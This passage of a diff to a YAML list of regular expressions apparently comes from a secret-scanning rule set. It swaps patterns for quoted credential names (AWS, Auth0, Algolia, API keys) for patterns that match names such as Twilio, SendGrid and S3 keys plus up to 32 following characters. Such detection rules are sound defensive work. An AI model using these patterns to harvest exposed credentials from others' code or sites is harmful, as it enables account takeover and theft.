- - "(?i)[\"']?aws[_-]?secrets[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?config[_-]?secretaccesskey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?config[_-]?accesskeyid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aws[_-]?access[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?author[_-]?npm[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?author[_-]?email[_-]?addr[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?auth0[_-]?client[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?auth0[_-]?api[_-]?clientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?auth[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?assistant[_-]?iam[_-]?apikey[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?artifacts[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?artifacts[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?artifacts[_-]?bucket[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?artifacts[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?artifacts[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?artifactory[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?argos[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?apple[_-]?id[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?appclientsecret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?app[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?app[_-]?secrete[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?app[_-]?report[_-]?token[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?app[_-]?bucket[_-]?perm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?apigw[_-]?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?apiary[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?api[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?api[_-]?key[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?api[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aos[_-]?sec[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?aos[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?ansible[_-]?vault[_-]?password[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?android[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?anaconda[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?amazon[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?amazon[_-]?bucket[_-]?name[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?alicloud[_-]?secret[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?alicloud[_-]?access[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?alias[_-]?pass[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?search[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?search[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?search[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?search[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?api[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?mcm[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?2[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?algolia[_-]?admin[_-]?key[_-]?1[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?air[-_]?table[-_]?api[-_]?key[\"']?[=:][\"']?.+[\"']"
- - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
- - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?"
+ - "(?i)zopim[_-]?account[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)zhuliang[_-]?gh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)zensonatypepassword(=| =|:| :).{1,32}"
+ - "(?i)zendesk[_-]?travis[_-]?github(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?server[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?partner[_-]?refresh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?partner[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?account[_-]?refresh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)yt[_-]?account[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)yangshun[_-]?gh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)yangshun[_-]?gh[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)www[_-]?googleapis[_-]?com(=| =|:| :).{1,32}"
+ - "(?i)wpt[_-]?ssh[_-]?private[_-]?key[_-]?base64(=| =|:| :).{1,32}"
+ - "(?i)wpt[_-]?ssh[_-]?connect(=| =|:| :).{1,32}"
+ - "(?i)wpt[_-]?report[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)wpt[_-]?prepare[_-]?dir(=| =|:| :).{1,32}"
+ - "(?i)wpt[_-]?db[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)wpt[_-]?db[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)wporg[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)wpjm[_-]?phpunit[_-]?google[_-]?geocode[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)wordpress[_-]?db[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)wordpress[_-]?db[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)wincert[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?test[_-]?server(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?fb[_-]?password[_-]?3(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?fb[_-]?password[_-]?2(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?fb[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?basic[_-]?password[_-]?5(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?basic[_-]?password[_-]?4(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?basic[_-]?password[_-]?3(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?basic[_-]?password[_-]?2(=| =|:| :).{1,32}"
+ - "(?i)widget[_-]?basic[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)watson[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)watson[_-]?device[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)watson[_-]?conversation[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)wakatime[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)vscetoken(=| =|:| :).{1,32}"
+ - "(?i)visual[_-]?recognition[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)virustotal[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)vip[_-]?github[_-]?deploy[_-]?key[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)vip[_-]?github[_-]?deploy[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)vip[_-]?github[_-]?build[_-]?repo[_-]?deploy[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)v[_-]?sfdc[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)v[_-]?sfdc[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)usertravis(=| =|:| :).{1,32}"
+ - "(?i)user[_-]?assets[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)user[_-]?assets[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)use[_-]?ssh(=| =|:| :).{1,32}"
+ - "(?i)us[_-]?east[_-]?1[_-]?elb[_-]?amazonaws[_-]?com(=| =|:| :).{1,32}"
+ - "(?i)urban[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)urban[_-]?master[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)urban[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)unity[_-]?serial(=| =|:| :).{1,32}"
+ - "(?i)unity[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)twitteroauthaccesstoken(=| =|:| :).{1,32}"
+ - "(?i)twitteroauthaccesssecret(=| =|:| :).{1,32}"
+ - "(?i)twitter[_-]?consumer[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)twitter[_-]?consumer[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)twine[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)twilio[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)twilio[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)twilio[_-]?configuration[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)twilio[_-]?chat[_-]?account[_-]?api[_-]?service(=| =|:| :).{1,32}"
+ - "(?i)twilio[_-]?api[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)twilio[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)trex[_-]?okta[_-]?client[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)trex[_-]?client[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?secure[_-]?env[_-]?vars(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?pull[_-]?request(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?gh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?e2e[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?com[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?branch(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)travis[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)token[_-]?core[_-]?java(=| =|:| :).{1,32}"
+ - "(?i)thera[_-]?oss[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)tester[_-]?keys[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)test[_-]?test(=| =|:| :).{1,32}"
+ - "(?i)test[_-]?github[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)tesco[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)svn[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)surge[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)surge[_-]?login(=| =|:| :).{1,32}"
+ - "(?i)stripe[_-]?public(=| =|:| :).{1,32}"
+ - "(?i)stripe[_-]?private(=| =|:| :).{1,32}"
+ - "(?i)strip[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)strip[_-]?publishable[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)stormpath[_-]?api[_-]?key[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)stormpath[_-]?api[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)starship[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)starship[_-]?account[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)star[_-]?test[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)star[_-]?test[_-]?location(=| =|:| :).{1,32}"
+ - "(?i)star[_-]?test[_-]?bucket(=| =|:| :).{1,32}"
+ - "(?i)star[_-]?test[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)staging[_-]?base[_-]?url[_-]?runscope(=| =|:| :).{1,32}"
+ - "(?i)ssmtp[_-]?config(=| =|:| :).{1,32}"
+ - "(?i)sshpass(=| =|:| :).{1,32}"
+ - "(?i)srcclr[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)square[_-]?reader[_-]?sdk[_-]?repository[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)sqssecretkey(=| =|:| :).{1,32}"
+ - "(?i)sqsaccesskey(=| =|:| :).{1,32}"
+ - "(?i)spring[_-]?mail[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)spotify[_-]?api[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)spotify[_-]?api[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)spaces[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)spaces[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)soundcloud[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)soundcloud[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)sonatypepassword(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?token[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?token[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?nexus[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?gpg[_-]?passphrase(=| =|:| :).{1,32}"
+ - "(?i)sonatype[_-]?gpg[_-]?key[_-]?name(=| =|:| :).{1,32}"
+ - "(?i)sonar[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)sonar[_-]?project[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sonar[_-]?organization[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)socrata[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)socrata[_-]?app[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)snyk[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)snyk[_-]?api[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)snoowrap[_-]?refresh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)snoowrap[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)snoowrap[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)slate[_-]?user[_-]?email(=| =|:| :).{1,32}"
+ - "(?i)slash[_-]?developer[_-]?space[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)slash[_-]?developer[_-]?space(=| =|:| :).{1,32}"
+ - "(?i)signing[_-]?key[_-]?sid(=| =|:| :).{1,32}"
+ - "(?i)signing[_-]?key[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)signing[_-]?key[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)signing[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)setsecretkey(=| =|:| :).{1,32}"
+ - "(?i)setdstsecretkey(=| =|:| :).{1,32}"
+ - "(?i)setdstaccesskey(=| =|:| :).{1,32}"
+ - "(?i)ses[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)ses[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)service[_-]?account[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)sentry[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sentry[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)sentry[_-]?endpoint(=| =|:| :).{1,32}"
+ - "(?i)sentry[_-]?default[_-]?org(=| =|:| :).{1,32}"
+ - "(?i)sentry[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)sendwithus[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sendgrid[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)sendgrid[_-]?user(=| =|:| :).{1,32}"
+ - "(?i)sendgrid[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)sendgrid[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sendgrid[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sendgrid(=| =|:| :).{1,32}"
+ - "(?i)selion[_-]?selenium[_-]?host(=| =|:| :).{1,32}"
+ - "(?i)selion[_-]?log[_-]?level[_-]?dev(=| =|:| :).{1,32}"
+ - "(?i)segment[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)secretkey(=| =|:| :).{1,32}"
+ - "(?i)secretaccesskey(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?key[_-]?base(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?9(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?8(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?7(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?6(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?5(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?4(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?3(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?2(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?11(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?10(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?1(=| =|:| :).{1,32}"
+ - "(?i)secret[_-]?0(=| =|:| :).{1,32}"
+ - "(?i)sdr[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)scrutinizer[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)sauce[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sandbox[_-]?aws[_-]?secret[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)sandbox[_-]?aws[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)sandbox[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)salesforce[_-]?bulk[_-]?test[_-]?security[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)salesforce[_-]?bulk[_-]?test[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)sacloud[_-]?api(=| =|:| :).{1,32}"
+ - "(?i)sacloud[_-]?access[_-]?token[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)sacloud[_-]?access[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?user[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?secret[_-]?assets(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?secret[_-]?app[_-]?logs(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?key[_-]?assets(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?key[_-]?app[_-]?logs(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?external[_-]?3[_-]?amazonaws[_-]?com(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?bucket[_-]?name[_-]?assets(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?bucket[_-]?name[_-]?app[_-]?logs(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)s3[_-]?access[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)rubygems[_-]?auth[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)rtd[_-]?store[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)rtd[_-]?key[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)route53[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)ropsten[_-]?private[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)rinkeby[_-]?private[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)rest[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)repotoken(=| =|:| :).{1,32}"
+ - "(?i)reporting[_-]?webdav[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)reporting[_-]?webdav[_-]?pwd(=| =|:| :).{1,32}"
+ - "(?i)release[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)release[_-]?gh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)registry[_-]?secure(=| =|:| :).{1,32}"
+ - "(?i)registry[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)refresh[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)rediscloud[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)redis[_-]?stunnel[_-]?urls(=| =|:| :).{1,32}"
+ - "(?i)randrmusicapiaccesstoken(=| =|:| :).{1,32}"
+ - "(?i)rabbitmq[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)quip[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)qiita[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)pypi[_-]?passowrd(=| =|:| :).{1,32}"
+ - "(?i)pushover[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)publish[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)publish[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)publish[_-]?access(=| =|:| :).{1,32}"
+ - "(?i)project[_-]?config(=| =|:| :).{1,32}"
+ - "(?i)prod[_-]?secret[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)prod[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)prod[_-]?access[_-]?key[_-]?id(=| =|:| :).{1,32}"
+ - "(?i)private[_-]?signing[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)pring[_-]?mail[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)preferred[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)prebuild[_-]?auth(=| =|:| :).{1,32}"
+ - "(?i)postgresql[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)postgresql[_-]?db(=| =|:| :).{1,32}"
+ - "(?i)postgres[_-]?env[_-]?postgres[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)postgres[_-]?env[_-]?postgres[_-]?db(=| =|:| :).{1,32}"
+ - "(?i)plugin[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)plotly[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)places[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)places[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)pg[_-]?host(=| =|:| :).{1,32}"
+ - "(?i)pg[_-]?database(=| =|:| :).{1,32}"
+ - "(?i)personal[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)personal[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)percy[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)percy[_-]?project(=| =|:| :).{1,32}"
+ - "(?i)paypal[_-]?client[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)passwordtravis(=| =|:| :).{1,32}"
+ - "(?i)parse[_-]?js[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)pagerduty[_-]?apikey(=| =|:| :).{1,32}"
+ - "(?i)packagecloud[_-]?token(=| =|:| :).{1,32}"
+ - "(?i)ossrh[_-]?username(=| =|:| :).{1,32}"
+ - "(?i)ossrh[_-]?secret(=| =|:| :).{1,32}"
+ - "(?i)ossrh[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)ossrh[_-]?pass(=| =|:| :).{1,32}"
+ - "(?i)ossrh[_-]?jira[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)os[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)os[_-]?auth[_-]?url(=| =|:| :).{1,32}"
+ - "(?i)org[_-]?project[_-]?gradle[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)org[_-]?gradle[_-]?project[_-]?sonatype[_-]?nexus[_-]?password(=| =|:| :).{1,32}"
+ - "(?i)openwhisk[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)open[_-]?whisk[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)onesignal[_-]?user[_-]?auth[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)onesignal[_-]?api[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)omise[_-]?skey(=| =|:| :).{1,32}"
+ - "(?i)omise[_-]?pubkey(=| =|:| :).{1,32}"
+ - "(?i)omise[_-]?pkey(=| =|:| :).{1,32}"
+ - "(?i)omise[_-]?key(=| =|:| :).{1,32}"
+ - "(?i)okta[_-]?oauth2[_-]?clientsecret(=| =|:| :).{1,32}"
